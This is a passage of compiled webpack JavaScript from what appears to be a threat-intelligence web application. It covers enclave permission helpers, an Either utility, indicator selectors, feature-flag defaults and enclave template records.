/* harmony import */ var __WEBPACK_IMPORTED_MODULE_18__InputWithButton_js__ = __webpack_require__(3613);
/* unused harmony namespace reexport */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_19__Carousel_js__ = __webpack_require__(3616);
/* unused harmony namespace reexport */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_20__ConfirmationModal_js__ = __webpack_require__(3619);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_20__ConfirmationModal_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_21__ErrorBoundary_js__ = __webpack_require__(1488);
/* unused harmony namespace reexport */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_22__ReportContent_js__ = __webpack_require__(3622);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "p", function() { return __WEBPACK_IMPORTED_MODULE_22__ReportContent_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_23__Table_js__ = __webpack_require__(1628);
/* unused harmony namespace reexport */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_24__PopoutActionsMenu_js__ = __webpack_require__(3628);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "l", function() { return __WEBPACK_IMPORTED_MODULE_24__PopoutActionsMenu_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_25__SessionExpiryWarning_js__ = __webpack_require__(3631);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "r", function() { return __WEBPACK_IMPORTED_MODULE_25__SessionExpiryWarning_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_26__TabbedUI_js__ = __webpack_require__(3634);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "t", function() { return __WEBPACK_IMPORTED_MODULE_26__TabbedUI_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_27__EnclaveIcon_js__ = __webpack_require__(910);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_27__EnclaveIcon_js__["a"]; });
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "d", function() { return __WEBPACK_IMPORTED_MODULE_27__EnclaveIcon_js__["b"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_28__EnclaveMenu_js__ = __webpack_require__(3639);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "e", function() { return __WEBPACK_IMPORTED_MODULE_28__EnclaveMenu_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_29__FormComponents_js__ = __webpack_require__(1633);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "o", function() { return __WEBPACK_IMPORTED_MODULE_29__FormComponents_js__["b"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_30__Tip_js__ = __webpack_require__(3642);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "w", function() { return __WEBPACK_IMPORTED_MODULE_30__Tip_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_31__LocalDatetime_js__ = __webpack_require__(3645);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "f", function() { return __WEBPACK_IMPORTED_MODULE_31__LocalDatetime_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_32__Tags_js__ = __webpack_require__(3646);
/* unused harmony namespace reexport */



































/***/ }),
/* 296 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(1308);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(217);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(1309);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2918);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 297 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export isPrivateEnclave */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return filterNoAccessEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return determineAccessType; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return accessTypeToPermissions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return attachAllowedAccessOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return hasExcessivePermissions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return isCommunityEnclave; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils_utils_js__ = __webpack_require__(78);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types__ = __webpack_require__(99);
function _defineProperty(obj, key, value) { if (key in obj) { Object.defineProperty(obj, key, { value: value, enumerable: true, configurable: true, writable: true }); } else { obj[key] = value; } return obj; }





/* Util to determine if an enclave is private or not, used for filtering */
var isPrivateEnclave = function isPrivateEnclave(enclave) {
  return enclave.label === 'INTERNAL';
};

/* NOTE: These methods are mostly utility helpers for the company, user, and enclave forms,
 * related to managing setting and changing enclave permissions visibilty.
 */

// Convert enclave to plain JS read/create/update permissions
var getPlainPermissions = function getPlainPermissions(enclave) {
  var read = enclave.get('read');
  var create = enclave.get('create');
  var update = enclave.get('update');
  return { read: read, create: create, update: update };
};

var filterNoAccessEnclaves = function filterNoAccessEnclaves(enclave) {
  return determineAccessType(enclave).get('value') === __WEBPACK_IMPORTED_MODULE_2__types__["g" /* READ_WRITE */];
};

/* Determine appropriate access option for enclave permissions field based on
 * selected read/create/update combination
 */
var determineAccessType = function determineAccessType(enclave) {
  var _getPlainPermissions = getPlainPermissions(enclave),
      read = _getPlainPermissions.read,
      create = _getPlainPermissions.create,
      update = _getPlainPermissions.update;

  if (update) return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({ value: __WEBPACK_IMPORTED_MODULE_2__types__["g" /* READ_WRITE */], label: 'Full Access' });
  if (create) return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({ value: __WEBPACK_IMPORTED_MODULE_2__types__["e" /* READ_CREATE */], label: 'Submission Access' });
  if (read) return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({ value: __WEBPACK_IMPORTED_MODULE_2__types__["f" /* READ_ONLY */], label: 'View Only' });
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({ value: __WEBPACK_IMPORTED_MODULE_2__types__["c" /* NONE */], label: 'No Access' });
};

var createPermissions = function createPermissions(read, create, update) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({ read: read, create: create, update: update });
};

/* Given an access type, NONE, READ_ONLY, READ_WRITE, return the
 * appropriate set of enclave read/create/update permissions
 */
var accessTypeToPermissions = function accessTypeToPermissions(accessType) {
  var value = accessType.value;

  switch (value) {
    case __WEBPACK_IMPORTED_MODULE_2__types__["f" /* READ_ONLY */]:
      return createPermissions(true, false, false);
    case __WEBPACK_IMPORTED_MODULE_2__types__["e" /* READ_CREATE */]:
      return createPermissions(true, true, false);
    case __WEBPACK_IMPORTED_MODULE_2__types__["g" /* READ_WRITE */]:
      return createPermissions(true, true, true);
    case __WEBPACK_IMPORTED_MODULE_2__types__["c" /* NONE */]:
    default:
      return createPermissions(false, false, false);
  }
};

/* Determine availabe options given a company enclave.
 * This method will add disabled fields to unavailable options.
 */
var createAllowedOptions = function createAllowedOptions(enclave) {
  var _fromJS;

  var _getPlainPermissions2 = getPlainPermissions(enclave),
      read = _getPlainPermissions2.read,
      create = _getPlainPermissions2.create,
      update = _getPlainPermissions2.update;

  var options = void 0;
  var accessOptionsMap = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])((_fromJS = {}, _defineProperty(_fromJS, __WEBPACK_IMPORTED_MODULE_2__types__["c" /* NONE */], { value: __WEBPACK_IMPORTED_MODULE_2__types__["c" /* NONE */], label: 'No Access' }), _defineProperty(_fromJS, __WEBPACK_IMPORTED_MODULE_2__types__["f" /* READ_ONLY */], { value: __WEBPACK_IMPORTED_MODULE_2__types__["f" /* READ_ONLY */], label: 'View Only' }), _defineProperty(_fromJS, __WEBPACK_IMPORTED_MODULE_2__types__["e" /* READ_CREATE */], { value: __WEBPACK_IMPORTED_MODULE_2__types__["e" /* READ_CREATE */], label: 'Submission Access' }), _defineProperty(_fromJS, __WEBPACK_IMPORTED_MODULE_2__types__["g" /* READ_WRITE */], { value: __WEBPACK_IMPORTED_MODULE_2__types__["g" /* READ_WRITE */], label: 'Full Access' }), _fromJS));
  if (update) {
    options = accessOptionsMap;
  } else if (create) {
    options = accessOptionsMap.update(__WEBPACK_IMPORTED_MODULE_2__types__["g" /* READ_WRITE */], function (o) {
      return o.set('disabled', true);
    });
  } else if (read) {
    options = accessOptionsMap.update(__WEBPACK_IMPORTED_MODULE_2__types__["g" /* READ_WRITE */], function (o) {
      return o.set('disabled', true);
    }).update(__WEBPACK_IMPORTED_MODULE_2__types__["e" /* READ_CREATE */], function (o) {
      return o.set('disabled', true);
    });
  } else {
    options = accessOptionsMap.update(__WEBPACK_IMPORTED_MODULE_2__types__["f" /* READ_ONLY */], function (o) {
      return o.set('disabled', true);
    }).update(__WEBPACK_IMPORTED_MODULE_2__types__["e" /* READ_CREATE */], function (o) {
      return o.set('disabled', true);
    }).update(__WEBPACK_IMPORTED_MODULE_2__types__["g" /* READ_WRITE */], function (o) {
      return o.set('disabled', true);
    });
  }

  return options.toList();
};

/* This method sets the current access type for an enclave and
 * determines the available options that can be selected for access.
 * This is used by the Users form.
 */
var attachAllowedAccessOptions = function attachAllowedAccessOptions(enclave) {
  var maximumAccess = determineAccessType(enclave);
  var accessOptions = createAllowedOptions(enclave);
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])(enclave.toObject()).merge(Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({ maximumAccess: maximumAccess, accessOptions: accessOptions }));
};

/* Used by the Companies Form for Admins when selecting enclave permissions level
 * for a company. We allow the Admin to select an access level beyond
 * the enclaves set access, and this method determines if the Admin's
 * selection exceeds the given permissions for the selected enclave.
 */
var hasExcessivePermissions = function hasExcessivePermissions(enclave, companyEnclave) {
  var selectedAccessType = enclave.getIn(['maximumAccess', 'value']);
  var allowedAccessType = companyEnclave.get('maximumAccess');
  if (selectedAccessType === __WEBPACK_IMPORTED_MODULE_2__types__["g" /* READ_WRITE */] && allowedAccessType !== __WEBPACK_IMPORTED_MODULE_2__types__["g" /* READ_WRITE */]) {
    return true;
  }
  if (selectedAccessType === __WEBPACK_IMPORTED_MODULE_2__types__["e" /* READ_CREATE */] && allowedAccessType === __WEBPACK_IMPORTED_MODULE_2__types__["f" /* READ_ONLY */] || allowedAccessType === __WEBPACK_IMPORTED_MODULE_2__types__["c" /* NONE */]) {
    return true;
  }
  if (selectedAccessType === __WEBPACK_IMPORTED_MODULE_2__types__["f" /* READ_ONLY */] && allowedAccessType === __WEBPACK_IMPORTED_MODULE_2__types__["c" /* NONE */]) {
    return true;
  }
  if (selectedAccessType !== __WEBPACK_IMPORTED_MODULE_2__types__["c" /* NONE */] && allowedAccessType === __WEBPACK_IMPORTED_MODULE_2__types__["c" /* NONE */]) {
    return true;
  }
  return false;
};

/**
 * Checks if the provided enclave is of type "Community".
 */
var isCommunityEnclave = function isCommunityEnclave(enclave) {
  if (Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils_utils_js__["isImmutable"])(enclave)) {
    return enclave.get('label', '') === 'COMMUNITY';
  }

  return enclave.label === 'COMMUNITY';
};

/***/ }),
/* 298 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(2910);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(1306);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2911);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2912);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types_js__ = __webpack_require__(712);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "types", function() { return __WEBPACK_IMPORTED_MODULE_4__types_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__constants_js__ = __webpack_require__(1307);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "constants", function() { return __WEBPACK_IMPORTED_MODULE_5__constants_js__; });













/***/ }),
/* 299 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isNil", function() { return isNil; });
/* harmony export (immutable) */ __webpack_exports__["aliasMethod"] = aliasMethod;
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Right", function() { return Right; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Left", function() { return Left; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fromNullable", function() { return fromNullable; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fromBoolean", function() { return fromBoolean; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "tryCatch", function() { return tryCatch; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "either", function() { return either; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "of", function() { return of; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ramda_src_curry__ = __webpack_require__(197);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ramda_src_curry___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_ramda_src_curry__);
/*  weak */
/**
 * Seems like flow typing is having issues with this when at full force...
 * Will likely be fixed once we switch to actual classes.
 */



/**
 * Either itself is abstract and does not hav ea concrete implementation
 * here. It simply serves as namespace. Either represents the idea of
 * Either(Left, Right). All concrete interactions with Eithers happen with
 * either the `Left` or `Right` constructors.
 *
 * For example, to explicitly use Either as a namespace simply do:
 * import * as Either form './path/to/Either
 */
var isNil = function isNil(x) {
  return x === null || x === undefined;
};

// Might use this in cases where I can't yet decide what to call something
function aliasMethod(method) {
  return function () {
    return this[method].apply(this, arguments);
  };
}

var Right = function Right(x) {
  return {
    of: function of(x) {
      return Right(x);
    },
    map: function map(f) {
      return Right(f(x));
    },
    chain: function chain(f) {
      return f(x);
    },
    fold: function fold(f, g) {
      return g(x);
    },
    foldOr: function foldOr(f) {
      return x;
    },
    toString: function toString() {
      return 'Right(' + x + ')';
    },

    either: aliasMethod('fold')
  };
};

var Left = function Left(x) {
  return {
    of: function of(x) {
      return Left(x);
    },
    map: function map(f) {
      return Left(x);
    },
    chain: function chain(f) {
      return Left(x);
    },
    fold: function fold(f, g) {
      return f(x);
    },
    foldOr: function foldOr(f) {
      return f(x);
    },
    toString: function toString() {
      return 'Left(' + x + ')';
    },

    either: aliasMethod('fold')
  };
};

var fromNullable = function fromNullable(x) {
  return isNil(x) ? Left(null) : Right(x);
};

var fromBoolean = function fromBoolean(x) {
  return x ? Right(x) : Left(x);
};

var tryCatch = function tryCatch(f) {
  try {
    return Right(f());
  } catch (err) {
    return Left(err);
  }
};

/**
 * Helper function to invoke the result of an either.
 */
var either = __WEBPACK_IMPORTED_MODULE_0_ramda_src_curry___default()(function (f, g, e) {
  return e.fold(f, g);
});

var of = function of(x) {
  return Right(x);
};

/***/ }),
/* 300 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "indicatorTags", function() { return indicatorTags; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "indicatorTagsLoading", function() { return indicatorTagsLoading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "indicatorList", function() { return indicatorList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "indicatorListLoading", function() { return indicatorListLoading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchParams", function() { return fetchParams; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentDisplayRange", function() { return currentDisplayRange; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "metadata", function() { return metadata; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enrichment", function() { return enrichment; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchingTagIndicators", function() { return fetchingTagIndicators; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "tagIndicators", function() { return tagIndicators; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enrichmentLoading", function() { return enrichmentLoading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "exportLoading", function() { return exportLoading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "metadataByIndicator", function() { return metadataByIndicator; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__miscellaneous_getters__ = __webpack_require__(345);







var indicatorTags = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['indicators', 'tags', 'data']);
var indicatorTagsLoading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['indicators', 'tags', 'loading']);
var indicatorList = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['indicators', 'library', 'indicatorList']);
var indicatorListLoading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['indicators', 'library', 'loading']);
var fetchParams = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['indicators', 'library', 'fetchParams']);
var currentDisplayRange = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['indicators', 'library', 'currentDisplayRange']);
var metadata = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['indicators', 'metadata']);
var enrichment = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['indicators', 'enrichment']);
var fetchingTagIndicators = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['indicators', 'tagCollection', 'loading']);
var tagIndicators = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['indicators', 'tagCollection', 'indicators']);
var enrichmentLoading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['indicators', 'enrichment', 'loading']);
var exportLoading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['indicators', 'exportLoading']);

/* Provide metadata for a given indicator by its id: type|value */
var metadataByIndicator = function metadataByIndicator(indicatorId) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(metadata, function (metadata) {
    return metadata.get(indicatorId) || null;
  });
};

/***/ }),
/* 301 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export Attribute */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Summary; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__constants__ = __webpack_require__(404);



var Attribute = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  key: '',
  displayName: '',
  value: '',
  logicalType: __WEBPACK_IMPORTED_MODULE_1__constants__["d" /* LOGICAL_TYPE */].SCALAR,
  description: ''
});

var Summary = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  reportId: '',
  attributes: new __WEBPACK_IMPORTED_MODULE_0_immutable__["List"](),
  description: '',
  enclaveId: '',
  type: '',
  updated: 0,
  value: '',
  score: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({ name: '', value: '' }),
  source: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({ name: '', key: '' }),
  severityLevel: -1 // -1 Is Unknown
});

/***/ }),
/* 302 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return flags; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return treatments; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return localhostTreatments; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return defaultTreatments; });
var _localhostTreatments, _defaultTreatments;

function _defineProperty(obj, key, value) { if (key in obj) { Object.defineProperty(obj, key, { value: value, enumerable: true, configurable: true, writable: true }); } else { obj[key] = value; } return obj; }

// Instructions for editing:
// https://trustar.atlassian.net/wiki/spaces/EN/pages/293568588/How+to+Maintain+and+Configure+Splits+for+the+Station+Application

var flags = {
  CATEGORY_TAGS_ENABLED: 'category_tags_enabled',
  MITRE_ATTACK_ENABLED: 'mitre_attack_enabled',
  CHAT_ENABLED: 'chat_enabled',
  PHISHING_TRIAGE_ENABLED: 'phishing_triage_enabled',
  WORKFLOWS_ENABLED: 'workflows_enabled',
  CASES_VIEW_ENABLED: 'cases_view_enabled',
  SHOW_SVG_UPLOADER: 'show_svg_uploader',
  CORRELATION_COUNT_ENABLED: 'correlation_count_enabled',
  COMMUNITY_ENCLAVE_ENABLED: 'community_enclave_enabled',
  SPLUNK_THEMES_ENABLED: 'use_splunk_themes'
};

var treatments = {
  ON: 'on',
  OFF: 'off'
};

// These configurations are the settings for the Split server
// while it is operating in 'localhost' mode.
//
// See: https://help.split.io/hc/en-us/articles/360020448791-JavaScript-SDK#localhost-mode
var localhostTreatments = (_localhostTreatments = {}, _defineProperty(_localhostTreatments, flags.CATEGORY_TAGS_ENABLED, { treatment: treatments.ON }), _defineProperty(_localhostTreatments, flags.MITRE_ATTACK_ENABLED, { treatment: treatments.ON }), _defineProperty(_localhostTreatments, flags.CHAT_ENABLED, { treatment: treatments.OFF }), _defineProperty(_localhostTreatments, flags.PHISHING_TRIAGE_ENABLED, { treatment: treatments.ON }), _defineProperty(_localhostTreatments, flags.WORKFLOWS_ENABLED, { treatment: treatments.ON }), _defineProperty(_localhostTreatments, flags.CASES_VIEW_ENABLED, { treatment: treatments.ON }), _defineProperty(_localhostTreatments, flags.SHOW_SVG_UPLOADER, { treatment: treatments.ON }), _defineProperty(_localhostTreatments, flags.CORRELATION_COUNT_ENABLED, { treatment: treatments.OFF }), _defineProperty(_localhostTreatments, flags.COMMUNITY_ENCLAVE_ENABLED, { treatment: treatments.OFF }), _defineProperty(_localhostTreatments, flags.SPLUNK_THEMES_ENABLED, { treatment: treatments.ON }), _localhostTreatments);

// These are the defaults for what will be injected into the
// Redux stores in a production-like setting.
var defaultTreatments = (_defaultTreatments = {}, _defineProperty(_defaultTreatments, flags.CHAT_ENABLED, { treatment: treatments.ON }), _defineProperty(_defaultTreatments, flags.CATEGORY_TAGS_ENABLED, { treatment: treatments.ON }), _defineProperty(_defaultTreatments, flags.MITRE_ATTACK_ENABLED, { treatment: treatments.OFF }), _defineProperty(_defaultTreatments, flags.PHISHING_TRIAGE_ENABLED, { treatment: treatments.OFF }), _defineProperty(_defaultTreatments, flags.WORKFLOWS_ENABLED, { treatment: treatments.OFF }), _defineProperty(_defaultTreatments, flags.CASES_VIEW_ENABLED, { treatment: treatments.ON }), _defineProperty(_defaultTreatments, flags.SHOW_SVG_UPLOADER, { treatment: treatments.OFF }), _defineProperty(_defaultTreatments, flags.CORRELATION_COUNT_ENABLED, { treatment: treatments.ON }), _defineProperty(_defaultTreatments, flags.COMMUNITY_ENCLAVE_ENABLED, { treatment: treatments.ON }), _defineProperty(_defaultTreatments, flags.SPLUNK_THEMES_ENABLED, { treatment: treatments.ON }), _defaultTreatments);

/***/ }),
/* 303 */,
/* 304 */,
/* 305 */,
/* 306 */,
/* 307 */,
/* 308 */,
/* 309 */,
/* 310 */,
/* 311 */,
/* 312 */,
/* 313 */,
/* 314 */,
/* 315 */,
/* 316 */,
/* 317 */,
/* 318 */,
/* 319 */,
/* 320 */,
/* 321 */,
/* 322 */,
/* 323 */,
/* 324 */,
/* 325 */,
/* 326 */,
/* 327 */,
/* 328 */,
/* 329 */,
/* 330 */,
/* 331 */,
/* 332 */,
/* 333 */,
/* 334 */,
/* 335 */,
/* 336 */,
/* 337 */,
/* 338 */,
/* 339 */,
/* 340 */,
/* 341 */,
/* 342 */,
/* 343 */,
/* 344 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ENCLAVE_TEMPLATES_ENDPOINT; });
/* unused harmony export NONE */
/* unused harmony export READ_ONLY */
/* unused harmony export READ_CREATE */
/* unused harmony export READ_WRITE */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return Options; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return _EnclaveTemplate; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return fromJson; });
/* unused harmony export toJson */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_debug__);




var debug = __WEBPACK_IMPORTED_MODULE_1_debug___default()('app:modules:templates:types'); // eslint-disable-line no-unused-vars

var ENCLAVE_TEMPLATES_ENDPOINT = '/services/enclave-templates';

var NONE = 'NONE';
var READ_ONLY = 'READ_ONLY';
var READ_CREATE = 'READ_CREATE';
var READ_WRITE = 'READ_WRITE';

var Options = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  query: '',
  sortBy: 'name',
  sortOrder: 'DESC'
});

/**
 * Should not be used directly. Use createEnclave since that ensures there's a
 * color prop
 */
var _EnclaveTemplate = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  id: null,
  name: '',
  description: '',
  iconUrl: '',
  iconSvgUrl: '',
  externalUrl: '',
  maximumAccess: null,
  credentialsType: null,
  ingestSource: '',
  entityTypes: null,
  label: null,
  subscriptionMethod: null,
  workflowSupported: false
});

/**
 * Creates an enclave template. Must pass an existing object with
 * an id attribute
 */
var fromJson = function fromJson(x) {
  var map = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])(x).update('entityTypes', function (xs) {
    return xs ? Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(xs) : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])([]);
  }); // Instantiate array to list if present

  return _EnclaveTemplate(map);
};

var toJson = function toJson(x) {
  return _EnclaveTemplate(x.update('entityTypes', function (entityTypes) {
    return entityTypes.map(function (et) {
      return et.keySeq();
    });
  }));
};

/***/ }),
/* 345 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getEntityTypes", function() { return getEntityTypes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getEntityTypesLoading", function() { return getEntityTypesLoading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getSelectedEntityTypes", function() { return getSelectedEntityTypes; });
